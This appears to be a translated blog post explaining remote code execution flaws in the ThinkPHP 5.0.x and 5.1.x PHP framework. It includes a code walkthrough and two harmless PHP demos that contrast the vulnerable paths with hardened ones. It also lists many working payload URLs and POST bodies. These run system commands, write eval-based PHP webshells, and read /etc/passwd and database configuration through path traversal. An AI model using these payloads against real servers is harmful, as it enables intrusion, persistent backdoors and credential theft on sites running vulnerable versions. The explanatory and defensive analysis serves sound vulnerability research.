Analysis of Thinkphp5.0.x Vulnerability Principle

This test environment uses PHP 7.0.12 + Apache + ThinkPHP 5.0.20.

poc:http://127.0.0.1/tp5.0/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['aa']);?>' > 2.php
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php eval($_POST[nmsl]);?> # write a webshell
http://url/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../application/database.php
http://url/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../../../../../../../../../../../../../../etc/passwd
http://url/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../application/config.php

Versions 5.0.8~5.0.19
payload: s=whoami&_method=__construct&filter&filter=system

Versions 5.0.20~5.0.23
payload (request URL, then POST body):
http://url/?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUSET_METHOD]=whoami
ThinkPHP vulnerability

The root cause is that the ThinkPHP5 framework core does not strictly filter the controller name. An attacker can therefore reach sensitive internal framework functions through the URL, which ends in a getshell.

How the RCE is triggered

$this->method is attacker-controllable, so __construct() can be invoked and used to overwrite the filter property of the Request class. App::run() then decides, based on the debug setting, whether to call $request->param(); $request->param() is also called when $dispatch['type'] is controller or method. $request->param() goes into the input() method, where the overwritten filter is passed as the callback to call_user_func(), which yields RCE.
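To make that chain concrete, here is an added example written for this page (not ThinkPHP's own code). A stripped-down MiniRequest class models the three pieces involved: the _method value is used as the name of a method to call, which reaches __construct(); the constructor copies every request key that matches a property name, so filter is overwritten; and input() feeds every returned value through the current filter with call_user_func(). The class and method names are stand-ins, the verb whitelist in methodHardened() is modelled on the one the patched release uses (an assumption), and the request body is constructed, using strtoupper as the hijacked callback instead of system so the demo is harmless.

```php
<?php
// Added example, not ThinkPHP's own code: a stripped-down model of the
// Request::method() -> __construct() -> input() chain described above.
// MiniRequest, methodVulnerable() and methodHardened() are stand-in names.

class MiniRequest
{
    protected $method;
    protected $filter = '';   // default input filter, like Request::$filter
    protected $post   = [];

    public function __construct(array $options = [])
    {
        // Like the real constructor: every option whose key matches a
        // property name overwrites that property, $filter included.
        foreach ($options as $name => $item) {
            if (property_exists($this, $name)) {
                $this->$name = $item;
            }
        }
    }

    // Vulnerable shape: the _method value is used directly as the name of a
    // method to call on $this with the whole POST array. "__construct"
    // therefore re-runs the constructor with attacker-controlled options.
    public function methodVulnerable(array $postData)
    {
        $this->post = $postData;
        if (isset($postData['_method'])) {
            $this->method = strtoupper($postData['_method']);
            $this->{$this->method}($postData);   // method names are case-insensitive
        } else {
            $this->method = 'POST';
        }
        return $this->method;
    }

    // Hardened shape (assumption: modelled on the verb whitelist of the
    // patched release): anything outside the list leaves the method as POST,
    // so no other method of the class is reachable through _method.
    public function methodHardened(array $postData)
    {
        $this->post   = $postData;
        $this->method = 'POST';
        if (isset($postData['_method'])) {
            $verb = strtolower($postData['_method']);
            if (in_array($verb, ['get', 'post', 'put', 'patch', 'delete'], true)) {
                $this->method = strtoupper($verb);
            }
        }
        return $this->method;
    }

    // Like Request::input(): every returned value is passed through the
    // current $filter with call_user_func(). A hijacked $filter runs here.
    public function input($name)
    {
        $value = isset($this->post[$name]) ? $this->post[$name] : null;
        foreach ((array) $this->filter as $callback) {
            if ($callback !== '' && is_callable($callback)) {
                $value = call_user_func($callback, $value);
            }
        }
        return $value;
    }

    public function currentFilter()
    {
        return $this->filter;
    }
}

// Constructed request body in the shape of the real payload, with strtoupper
// in place of system so the hijacked callback is harmless.
$body = ['_method' => '__construct', 'filter' => ['strtoupper'], 's' => 'whoami'];

$vulnerable = new MiniRequest();
$vulnerable->methodVulnerable($body);
echo 'vulnerable filter: ', json_encode($vulnerable->currentFilter()),
     ' -> input(s) = ', $vulnerable->input('s'), PHP_EOL;

$hardened = new MiniRequest();
$hardened->methodHardened($body);
echo 'hardened   filter: ', json_encode($hardened->currentFilter()),
     ' -> input(s) = ', $hardened->input('s'), PHP_EOL;
```

Run it with the php CLI. On the vulnerable path the filter property is replaced by the array from the request body and input('s') comes back transformed by that callback; on the hardened path _method is not an allowed verb, the constructor is never re-entered, and the default filter stays in place.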

5.1.x :

?s=index/\think\Request/input&filter[]=system&data=pwd

?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?> 

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?> 

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x

?s=index/think\config/get&name=database.username // read configuration values

?s=index/\think\Lang/load&file=../../test.jpg    // include an arbitrary file

?s=index/\think\Config/load&file=../../t.php     // include an arbitrary .php file

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

The payloads therefore fall into two kinds: one relies on the method and __construct methods of the Request class, the other on the fact that the controller obtained by the Request class in compatibility mode is not validated.

Reference: https://y4er.com/post/thinkphp5-rce/

Start from the entry file public/index.php: it requires thinkphp/start.php, and start.php executes the run() method in think/App.php.

The vulnerability in ThinkPHP 5.0.x comes from URL handling. In the route-detection part of run() in think/App.php, follow routeCheck(). This function checks whether a route is defined for the URL; because no route is defined, there is no URL dispatch to return, so the check falls through (false) into parseUrl().

parseUrl() parses the variable $path (here index/think\app/invokefunction). Following the function, it normalizes $path: '/' is replaced with '|', and the string is trimmed at both ends before being split into its segments. parseUrl() then returns $route (module, controller and action) as an array to routeCheck(), and routeCheck() returns the dispatch variable to run().

The vulnerability is right here: not in the method execution itself, but in the missing strict filtering of the URL. The controller segment think\app is accepted exactly as supplied.

The dispatch type at this point is module, so execution enters case 'module' and follows the module() method. Continue into invokeMethod(), which module() returns. In invokeMethod(), $args receives the remaining parameters from the PoC: function=call_user_func_array&vars[0]=system&vars[1][]=whoami. call_user_func_array calls the callback function with an array as its parameters. Finally, the invokefunction method of the think\App class is executed through the reflection call invokeArgs().

In short: when no route matches, parseURL does not strictly filter the URL, so the backslash-prefixed name think\app survives and is passed into exec() as the controller. $reflect->invokeArgs(isset($class) ? $class : null, $args) then resolves the class and parameters, which leads to command execution.
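The following added example (written for this page, not the framework's code) models the dispatch path just traced: the s= parameter is split into module/controller/action the way parseUrl() does, a controller name containing a backslash is taken as a fully qualified class the way Loader::controller() treats it, and the action is invoked through ReflectionMethod::invokeArgs() with request parameters bound by name. A harmless Demo\Greeter class stands in for \think\App, and controllerNameIsValid() applies an identifier check of the form the patched releases added before resolving the controller (the exact regex is reproduced from memory and is an assumption). All class, function and parameter names and all inputs are constructed for the example.

```php
<?php
// Added example, not ThinkPHP's own code: a model of how the 5.0.x dispatcher
// turns s= into [module, controller, action] and why a controller name that
// contains a backslash reaches an arbitrary class. Demo\Greeter, parsePath(),
// resolveClass(), controllerNameIsValid() and dispatch() are stand-in names.

namespace Demo;

class Greeter
{
    public function hello($name = 'world')
    {
        return "hello $name";
    }
}

// Like Route::parseUrl()/parseUrlPath(): '|' and '/' are both separators,
// the path is trimmed and split into module, controller and action.
function parsePath(string $s): array
{
    $s     = str_replace('|', '/', $s);
    $parts = explode('/', trim($s, '/'));
    return [
        'module'     => isset($parts[0]) ? $parts[0] : null,
        'controller' => isset($parts[1]) ? $parts[1] : null,
        'action'     => isset($parts[2]) ? $parts[2] : null,
    ];
}

// Like Loader::controller(): a name containing '\' is used as a fully
// qualified class name; anything else is mapped into the app namespace
// ('Demo' here so the legitimate route resolves to the class above).
function resolveClass(string $controller, string $appNamespace = 'Demo'): string
{
    if (strpos($controller, '\\') !== false) {
        return $controller;
    }
    return $appNamespace . '\\' . ucfirst($controller);
}

// Identifier check of the form the patched releases apply to the controller
// segment before resolving it (assumption: regex reproduced from memory).
function controllerNameIsValid(string $controller): bool
{
    return (bool) preg_match('/^[A-Za-z](\w|\.)*$/', $controller);
}

// Like App::invokeMethod(): reflective call with the remaining request
// parameters bound to the method's arguments by name.
function dispatch(string $s, array $params, bool $hardened): string
{
    $route = parsePath($s);
    if ($hardened && !controllerNameIsValid((string) $route['controller'])) {
        return 'rejected: controller not exists:' . $route['controller'];
    }
    $class = ltrim(resolveClass((string) $route['controller']), '\\');
    if (!class_exists($class)) {
        return "no such class: $class";
    }
    $method = new \ReflectionMethod($class, $route['action']);
    $args   = [];
    foreach ($method->getParameters() as $p) {
        if (isset($params[$p->getName()])) {
            $args[] = $params[$p->getName()];
        } else {
            $args[] = $p->isDefaultValueAvailable() ? $p->getDefaultValue() : null;
        }
    }
    return (string) $method->invokeArgs(new $class(), $args);
}

// Constructed inputs: a normal route, then the PoC shape with both separator
// styles, targeting the harmless class instead of \think\App.
$cases = [
    ['index/greeter/hello',         ['name' => 'tp']],
    ['index/\\Demo\\Greeter/hello', ['name' => 'attacker']],
    ['index|\\Demo\\Greeter|hello', ['name' => 'attacker']],
];
foreach ($cases as $case) {
    list($s, $params) = $case;
    echo str_pad($s, 28), ' vulnerable => ', dispatch($s, $params, false), PHP_EOL;
    echo str_pad($s, 28), ' hardened   => ', dispatch($s, $params, true), PHP_EOL;
}
```

Run it with the php CLI. The plain route resolves to Demo\Greeter on both paths; the backslash-prefixed controller is resolved and invoked on the vulnerable path, and rejected by the identifier check on the hardened one. The '|' form behaves identically to the '/' form because both separators are normalized before the path is split, which is why the payloads above work with either.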

Origin: blog.csdn.net/weixin_45682070/article/details/108224794